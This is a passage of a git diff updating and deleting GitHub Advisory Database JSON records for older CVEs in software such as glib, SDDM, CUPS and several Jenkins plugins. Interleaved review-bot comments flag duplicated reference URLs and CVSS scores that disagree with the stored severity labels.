-
+ "CWE-178"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-q7q8-g4m3-j3pq/GHSA-q7q8-g4m3-j3pq.json b/advisories/unreviewed/2022/05/GHSA-q7q8-g4m3-j3pq/GHSA-q7q8-g4m3-j3pq.json
index 8cdbfe540b9d5..50716e4cd850f 100644
--- a/advisories/unreviewed/2022/05/GHSA-q7q8-g4m3-j3pq/GHSA-q7q8-g4m3-j3pq.json
+++ b/advisories/unreviewed/2022/05/GHSA-q7q8-g4m3-j3pq/GHSA-q7q8-g4m3-j3pq.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-q7q8-g4m3-j3pq",
- "modified": "2022-05-02T03:43:39Z",
+ "modified": "2024-02-08T15:30:26Z",
 "published": "2022-05-02T03:43:39Z",
 "aliases": [
 "CVE-2009-3289"
 ],
 "details": "The g_file_copy function in glib 2.0 sets the permissions of a target file to the permissions of a symbolic link (777), which allows user-assisted local users to modify files of other users, as demonstrated by using Nautilus to modify the permissions of the user home directory.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -45,7 +48,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-732"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-q83c-64c9-c42m/GHSA-q83c-64c9-c42m.json b/advisories/unreviewed/2022/05/GHSA-q83c-64c9-c42m/GHSA-q83c-64c9-c42m.json
deleted file mode 100644
index 31435367367c0..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-q83c-64c9-c42m/GHSA-q83c-64c9-c42m.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-q83c-64c9-c42m",
- "modified": "2022-05-17T19:57:15Z",
- "published": "2022-05-17T19:57:15Z",
- "aliases": [
- "CVE-2014-5012"
- ],
- "details": "DOMPDF before 0.6.2 allows denial of service.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-5012"
- },
- {
- "type": "WEB",
- "url": "https://github.com/dompdf/dompdf/compare/v0.6.1...v0.6.2"
- },
- {
- "type": "WEB",
- "url": "https://github.com/dompdf/dompdf/releases/tag/v0.6.2"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2020-01-10T06:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-q868-g69p-72cw/GHSA-q868-g69p-72cw.json b/advisories/unreviewed/2022/05/GHSA-q868-g69p-72cw/GHSA-q868-g69p-72cw.json
index 6fba196ea6ede..23bdbccd1a6e9 100644
--- a/advisories/unreviewed/2022/05/GHSA-q868-g69p-72cw/GHSA-q868-g69p-72cw.json
+++ b/advisories/unreviewed/2022/05/GHSA-q868-g69p-72cw/GHSA-q868-g69p-72cw.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-q868-g69p-72cw",
- "modified": "2022-05-24T17:33:09Z",
+ "modified": "2024-02-03T09:30:16Z",
 "published": "2022-05-24T17:33:09Z",
 "aliases": [
 "CVE-2020-28049"
 ],
 "details": "An issue was discovered in SDDM before 0.19.0. It incorrectly starts the X server in a way that - for a short time period - allows local unprivileged users to create a connection to the X server without providing proper authentication. A local attacker can thus access X server display contents and, for example, intercept keystrokes or access the clipboard. This is caused by a race condition during Xauthority file creation.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
+ }
 ],
 "affected": [
@@ -34,10 +37,18 @@
 "type": "WEB",
 "url": "https://lists.debian.org/debian-lts-announce/2020/11/msg00009.html"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GT3EX5NSQJJAKY63ENSMEDX6NYZLYY3S/"
+ },
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GT3EX5NSQJJAKY63ENSMEDX6NYZLYY3S/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-02"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2020/dsa-4783"
diff --git a/advisories/unreviewed/2022/05/GHSA-q94h-vc2h-j68g/GHSA-q94h-vc2h-j68g.json b/advisories/unreviewed/2022/05/GHSA-q94h-vc2h-j68g/GHSA-q94h-vc2h-j68g.json
index c26d378462852..f530e6850fd86 100644
--- a/advisories/unreviewed/2022/05/GHSA-q94h-vc2h-j68g/GHSA-q94h-vc2h-j68g.json
+++ b/advisories/unreviewed/2022/05/GHSA-q94h-vc2h-j68g/GHSA-q94h-vc2h-j68g.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-q94h-vc2h-j68g",
- "modified": "2022-05-01T01:47:40Z",
+ "modified": "2024-02-08T18:30:37Z",
 "published": "2022-05-01T01:47:40Z",
 "aliases": [
 "CVE-2005-0199"
 ],
 "details": "Integer underflow in the Lists_MakeMask() function in lists.c in ngIRCd before 0.8.2 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long MODE line that causes an incorrect length calculation, which leads to a buffer overflow.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -53,7 +56,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-191"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-qc3m-6xmq-7hrj/GHSA-qc3m-6xmq-7hrj.json b/advisories/unreviewed/2022/05/GHSA-qc3m-6xmq-7hrj/GHSA-qc3m-6xmq-7hrj.json
deleted file mode 100644
index 3812766dc6a6e..0000000000000
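Review bot: The reference added to GHSA-q868-g69p-72cw, `"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GT3EX5NSQJJAKY63ENSMEDX6NYZLYY3S/"`, points at the same message as the existing entry immediately below it, the two differing only in whether the `@` in the list address is percent-encoded, so the `references` array now contains a duplicate. If the importer deduplicates by comparing URL strings literally, it should normalise percent-encoding (at least `%40` to `@`) before comparing, and this entry can then be dropped rather than carried forward. The same duplicated pair is introduced twice in the GHSA-qfcf-2jfw-4cm8 hunk that follows (the `36VN2...` and `HY5YC...` messages). The `references` array starts and ends outside the hunk.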
--- a/advisories/unreviewed/2022/05/GHSA-qc3m-6xmq-7hrj/GHSA-qc3m-6xmq-7hrj.json
+++ /dev/null
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-qc3m-6xmq-7hrj",
- "modified": "2022-05-13T01:31:33Z",
- "published": "2022-05-13T01:31:33Z",
- "aliases": [
- "CVE-2019-10289"
- ],
- "details": "A cross-site request forgery vulnerability in Jenkins Netsparker Cloud Scan Plugin 1.1.5 and older in the NCScanBuilder.DescriptorImpl#doValidateAPI form validation method allowed attackers to initiate a connection to an attacker-specified server.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10289"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1032"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/107790"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-352"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-04-04T16:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-qfcf-2jfw-4cm8/GHSA-qfcf-2jfw-4cm8.json b/advisories/unreviewed/2022/05/GHSA-qfcf-2jfw-4cm8/GHSA-qfcf-2jfw-4cm8.json
index 776099f2de210..7cf293abe56eb 100644
--- a/advisories/unreviewed/2022/05/GHSA-qfcf-2jfw-4cm8/GHSA-qfcf-2jfw-4cm8.json
+++ b/advisories/unreviewed/2022/05/GHSA-qfcf-2jfw-4cm8/GHSA-qfcf-2jfw-4cm8.json
@@ -41,6 +41,14 @@
 "type": "WEB",
 "url": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/qt/OSV-2021-903.yaml"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/36VN2WKMNQUSTF6ZW2X52NPAJVXJ4S5I/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HY5YCSDCTLHVMP3OXOM6HNTWHV6DBHDX/"
+ },
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36VN2WKMNQUSTF6ZW2X52NPAJVXJ4S5I/"
@@ -49,6 +57,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HY5YCSDCTLHVMP3OXOM6HNTWHV6DBHDX/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-03"
+ },
 {
 "type": "WEB",
 "url": "https://wiki.qt.io/Qt_5.15_Release#Known_Issues"
diff --git a/advisories/unreviewed/2022/05/GHSA-qg7x-4h4q-3m49/GHSA-qg7x-4h4q-3m49.json b/advisories/unreviewed/2022/05/GHSA-qg7x-4h4q-3m49/GHSA-qg7x-4h4q-3m49.json
deleted file mode 100644
index 293d35b7159fb..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-qg7x-4h4q-3m49/GHSA-qg7x-4h4q-3m49.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-qg7x-4h4q-3m49",
- "modified": "2022-05-24T17:06:12Z",
- "published": "2022-05-24T17:06:12Z",
- "aliases": [
- "CVE-2015-1811"
- ],
- "details": "XML external entity (XXE) vulnerability in CloudBees Jenkins before 1.600 and LTS before 1.596.1 allows remote attackers to read arbitrary XML files via a crafted XML document.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1811"
- },
- {
- "type": "WEB",
- "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1205632"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2015-02-27/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2020-01-15T19:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-qh3m-c6hw-5hmv/GHSA-qh3m-c6hw-5hmv.json b/advisories/unreviewed/2022/05/GHSA-qh3m-c6hw-5hmv/GHSA-qh3m-c6hw-5hmv.json
deleted file mode 100644
index 03cc49a8946f9..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-qh3m-c6hw-5hmv/GHSA-qh3m-c6hw-5hmv.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-qh3m-c6hw-5hmv",
- "modified": "2023-10-25T18:31:31Z",
- "published": "2022-05-24T17:03:47Z",
- "aliases": [
- "CVE-2019-16556"
- ],
- "details": "Jenkins Rundeck Plugin 3.6.5 and earlier stores credentials unencrypted in its global configuration file and in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16556"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1636"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-522"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-12-17T15:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-qh4q-fwf8-qqrw/GHSA-qh4q-fwf8-qqrw.json b/advisories/unreviewed/2022/05/GHSA-qh4q-fwf8-qqrw/GHSA-qh4q-fwf8-qqrw.json
deleted file mode 100644
index 800701e06641c..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-qh4q-fwf8-qqrw/GHSA-qh4q-fwf8-qqrw.json
+++ /dev/null
@@ -1,55 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-qh4q-fwf8-qqrw",
- "modified": "2022-05-17T05:48:31Z",
- "published": "2022-05-17T05:48:31Z",
- "aliases": [
- "CVE-2010-3198"
- ],
- "details": "ZServer in Zope 2.10.x before 2.10.12 and 2.11.x before 2.11.7 allows remote attackers to cause a denial of service (crash of worker threads) via vectors that trigger uncaught exceptions.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3198"
- },
- {
- "type": "WEB",
- "url": "https://bugs.launchpad.net/zope2/+bug/627988"
- },
- {
- "type": "WEB",
- "url": "https://mail.zope.org/pipermail/zope-announce/2010-September/002247.html"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/42939"
- },
- {
- "type": "WEB",
- "url": "http://www.vupen.com/english/advisories/2010/2275"
- },
- {
- "type": "WEB",
- "url": "http://www.zope.org/Products/Zope/2.10.12/CHANGES.txt"
- },
- {
- "type": "WEB",
- "url": "http://www.zope.org/Products/Zope/2.11.7/CHANGES.txt"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2010-09-08T20:00:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-qj27-w92h-fc9r/GHSA-qj27-w92h-fc9r.json b/advisories/unreviewed/2022/05/GHSA-qj27-w92h-fc9r/GHSA-qj27-w92h-fc9r.json
deleted file mode 100644
index 51080041677be..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-qj27-w92h-fc9r/GHSA-qj27-w92h-fc9r.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-qj27-w92h-fc9r",
- "modified": "2022-05-24T17:06:12Z",
- "published": "2022-05-24T17:06:12Z",
- "aliases": [
- "CVE-2015-1809"
- ],
- "details": "XML external entity (XXE) vulnerability in CloudBees Jenkins before 1.600 and LTS before 1.596.1 allows remote attackers to read arbitrary XML files via an XPath query.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1809"
- },
- {
- "type": "WEB",
- "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1205625"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2015-02-27/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2020-01-15T19:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-qj7x-wm9q-qjx8/GHSA-qj7x-wm9q-qjx8.json b/advisories/unreviewed/2022/05/GHSA-qj7x-wm9q-qjx8/GHSA-qj7x-wm9q-qjx8.json
deleted file mode 100644
index 9a55c1fc9c331..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-qj7x-wm9q-qjx8/GHSA-qj7x-wm9q-qjx8.json
+++ /dev/null
@@ -1,43 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-qj7x-wm9q-qjx8",
- "modified": "2022-05-17T05:50:05Z",
- "published": "2022-05-17T05:50:05Z",
- "aliases": [
- "CVE-2010-2422"
- ],
- "details": "Cross-site scripting (XSS) vulnerability in PortalTransforms in Plone 2.1 through 3.3.4 before hotfix 20100612 allows remote attackers to inject arbitrary web script or HTML via the safe_html transform.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2422"
- },
- {
- "type": "WEB",
- "url": "http://plone.org/products/plone/security/advisories/cve-2010-unassigned-html-injection-in-safe_html"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/40270"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/40999"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2010-06-24T12:17:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-qj88-9fvw-xw2m/GHSA-qj88-9fvw-xw2m.json b/advisories/unreviewed/2022/05/GHSA-qj88-9fvw-xw2m/GHSA-qj88-9fvw-xw2m.json
index 9094936656554..20eb855b4707a 100644
--- a/advisories/unreviewed/2022/05/GHSA-qj88-9fvw-xw2m/GHSA-qj88-9fvw-xw2m.json
+++ b/advisories/unreviewed/2022/05/GHSA-qj88-9fvw-xw2m/GHSA-qj88-9fvw-xw2m.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qj88-9fvw-xw2m",
- "modified": "2022-05-01T02:00:59Z",
+ "modified": "2024-02-08T21:30:30Z",
 "published": "2022-05-01T02:00:59Z",
 "aliases": [
 "CVE-2005-1674"
 ],
 "details": "Cross-Site Request Forgery (CSRF) vulnerability in Help Center Live allows remote attackers to perform actions as the administrator via a link or IMG tag to view.php.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
+ }
 ],
 "affected": [
@@ -29,7 +32,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-352"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-qj8g-gjw2-qf5r/GHSA-qj8g-gjw2-qf5r.json b/advisories/unreviewed/2022/05/GHSA-qj8g-gjw2-qf5r/GHSA-qj8g-gjw2-qf5r.json
index 9ea1b3922d831..8194ccd5cc2a8 100644
--- a/advisories/unreviewed/2022/05/GHSA-qj8g-gjw2-qf5r/GHSA-qj8g-gjw2-qf5r.json
+++ b/advisories/unreviewed/2022/05/GHSA-qj8g-gjw2-qf5r/GHSA-qj8g-gjw2-qf5r.json
@@ -37,7 +37,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-119"
+ "CWE-119",
+ "CWE-120"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-qmvx-xrr5-64fm/GHSA-qmvx-xrr5-64fm.json b/advisories/unreviewed/2022/05/GHSA-qmvx-xrr5-64fm/GHSA-qmvx-xrr5-64fm.json
index 6443b7cf460a4..01dcc73b174e4 100644
--- a/advisories/unreviewed/2022/05/GHSA-qmvx-xrr5-64fm/GHSA-qmvx-xrr5-64fm.json
+++ b/advisories/unreviewed/2022/05/GHSA-qmvx-xrr5-64fm/GHSA-qmvx-xrr5-64fm.json
@@ -33,7 +33,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-79"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-qrh2-mh97-pw8p/GHSA-qrh2-mh97-pw8p.json b/advisories/unreviewed/2022/05/GHSA-qrh2-mh97-pw8p/GHSA-qrh2-mh97-pw8p.json
deleted file mode 100644
index c5bce3bfa919c..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-qrh2-mh97-pw8p/GHSA-qrh2-mh97-pw8p.json
+++ /dev/null
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-qrh2-mh97-pw8p",
- "modified": "2022-05-13T01:25:43Z",
- "published": "2022-05-13T01:25:43Z",
- "aliases": [
- "CVE-2019-1003076"
- ],
- "details": "A cross-site request forgery vulnerability in Jenkins Audit to Database Plugin in the DbAuditPublisherDescriptorImpl#doTestJdbcConnection form validation method allows attackers to initiate a connection to an attacker-specified server.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003076"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-977"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/107790"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-352"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-04-04T16:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-qvh7-j2x6-25x5/GHSA-qvh7-j2x6-25x5.json b/advisories/unreviewed/2022/05/GHSA-qvh7-j2x6-25x5/GHSA-qvh7-j2x6-25x5.json
index b3accd1da5000..dacd10984eb36 100644
--- a/advisories/unreviewed/2022/05/GHSA-qvh7-j2x6-25x5/GHSA-qvh7-j2x6-25x5.json
+++ b/advisories/unreviewed/2022/05/GHSA-qvh7-j2x6-25x5/GHSA-qvh7-j2x6-25x5.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qvh7-j2x6-25x5",
- "modified": "2022-05-02T03:46:20Z",
+ "modified": "2024-02-02T18:30:21Z",
 "published": "2022-05-02T03:46:20Z",
 "aliases": [
 "CVE-2009-3553"
 ],
 "details": "Use-after-free vulnerability in the abstract file-descriptor handling interface in the cupsdDoSelect function in scheduler/select.c in the scheduler in cupsd in CUPS 1.3.7 and 1.3.10 allows remote attackers to cause a denial of service (daemon crash or hang) via a client disconnection during listing of a large number of print jobs, related to improperly maintaining a reference count. NOTE: some of these details are obtained from third party information.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
 ],
 "affected": [
 
@@ -117,7 +120,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-416"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-r2g9-49rq-6p4c/GHSA-r2g9-49rq-6p4c.json b/advisories/unreviewed/2022/05/GHSA-r2g9-49rq-6p4c/GHSA-r2g9-49rq-6p4c.json
index a52faeabe1293..a099e336f1e07 100644
--- a/advisories/unreviewed/2022/05/GHSA-r2g9-49rq-6p4c/GHSA-r2g9-49rq-6p4c.json
+++ b/advisories/unreviewed/2022/05/GHSA-r2g9-49rq-6p4c/GHSA-r2g9-49rq-6p4c.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-r2g9-49rq-6p4c",
- "modified": "2022-05-01T02:05:39Z",
+ "modified": "2024-02-08T21:30:31Z",
 "published": "2022-05-01T02:05:39Z",
 "aliases": [
 "CVE-2005-2181"
 ],
 "details": "Cisco 7940/7960 Voice over IP (VoIP) phones do not properly check the Call-ID, branch, and tag values in a NOTIFY message to verify a subscription, which allows remote attackers to spoof messages such as the \"Messages waiting\" message.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
+ }
 ],
 "affected": [
 
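Review bot: The CVSS_V3 vector added under `severity` in GHSA-qvh7-j2x6-25x5 (`AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`) computes to a 7.5 base score, which the CVSS 3.1 qualitative scale rates HIGH, yet the second hunk of the same file leaves `database_specific.severity` at `"MODERATE"`. If that field is meant to track the CVSS rating, the same change should update it, `"severity": "HIGH",`, or the source of the qualitative value should be documented so consumers do not read two conflicting severities from one record. The same pattern appears in GHSA-r2g9-49rq-6p4c and GHSA-rpcf-xw9j-7c7j (7.5 vectors beside `"MODERATE"`), and in GHSA-r9vw-px66-gx7g and GHSA-w3mr-x868-44rj, where a `C:H/I:H/A:H` vector with no PR/UI requirement (9.8, CRITICAL) sits beside `"severity": "HIGH"`.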
@@ -37,7 +40,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-347"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-r5c7-qcc9-5v7m/GHSA-r5c7-qcc9-5v7m.json b/advisories/unreviewed/2022/05/GHSA-r5c7-qcc9-5v7m/GHSA-r5c7-qcc9-5v7m.json
deleted file mode 100644
index 51b9d78b61e22..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-r5c7-qcc9-5v7m/GHSA-r5c7-qcc9-5v7m.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-r5c7-qcc9-5v7m",
- "modified": "2022-05-13T01:36:51Z",
- "published": "2022-05-13T01:36:51Z",
- "aliases": [
- "CVE-2017-2650"
- ],
- "details": "It was found that the use of Pipeline: Classpath Step Jenkins plugin enables a bypass of the Script Security sandbox for users with SCM commit access, as well as users with e.g. Job/Configure permission in Jenkins.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2650"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2017-03-20/"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/96981"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-07-27T20:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-r5jr-82x4-r6j7/GHSA-r5jr-82x4-r6j7.json b/advisories/unreviewed/2022/05/GHSA-r5jr-82x4-r6j7/GHSA-r5jr-82x4-r6j7.json
deleted file mode 100644
index b69266942dd3f..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-r5jr-82x4-r6j7/GHSA-r5jr-82x4-r6j7.json
+++ /dev/null
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-r5jr-82x4-r6j7",
- "modified": "2022-05-13T01:25:16Z",
- "published": "2022-05-13T01:25:16Z",
- "aliases": [
- "CVE-2019-1003097"
- ],
- "details": "Jenkins Crowd Integration Plugin stores credentials unencrypted in the global config.xml configuration file on the Jenkins master where they can be viewed by users with access to the master file system.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003097"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1069"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/107790"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-522"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-04-04T16:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-r859-p3hv-36hf/GHSA-r859-p3hv-36hf.json b/advisories/unreviewed/2022/05/GHSA-r859-p3hv-36hf/GHSA-r859-p3hv-36hf.json
index 7b2ca4147fc4f..01ecc99186d3e 100644
--- a/advisories/unreviewed/2022/05/GHSA-r859-p3hv-36hf/GHSA-r859-p3hv-36hf.json
+++ b/advisories/unreviewed/2022/05/GHSA-r859-p3hv-36hf/GHSA-r859-p3hv-36hf.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-r859-p3hv-36hf",
- "modified": "2022-05-02T06:12:17Z",
+ "modified": "2024-02-03T03:30:26Z",
 "published": "2022-05-02T06:12:17Z",
 "aliases": [
 "CVE-2010-0378"
 ],
